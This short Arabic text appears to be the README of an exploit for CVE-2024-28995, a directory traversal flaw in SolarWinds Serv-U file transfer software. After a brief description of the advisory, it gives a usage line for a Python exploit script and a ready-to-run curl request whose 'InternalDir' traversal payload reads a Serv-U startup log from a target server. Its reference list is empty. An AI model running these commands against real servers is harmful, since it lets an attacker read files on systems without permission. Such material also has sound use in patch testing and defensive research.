
استغلال لـ CVE-2024-28995
في 5 يونيو 2024، نشرت SolarWinds إشعارًا لـ CVE-2024-28995، وهي ثغرة اجتياز الدليل عالية الخطورة تؤثر على حل نقل الملفات Serv-U. تم اكتشاف الثغرة بواسطة الباحث Hussein Daher من Web Immunify.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
المراجع: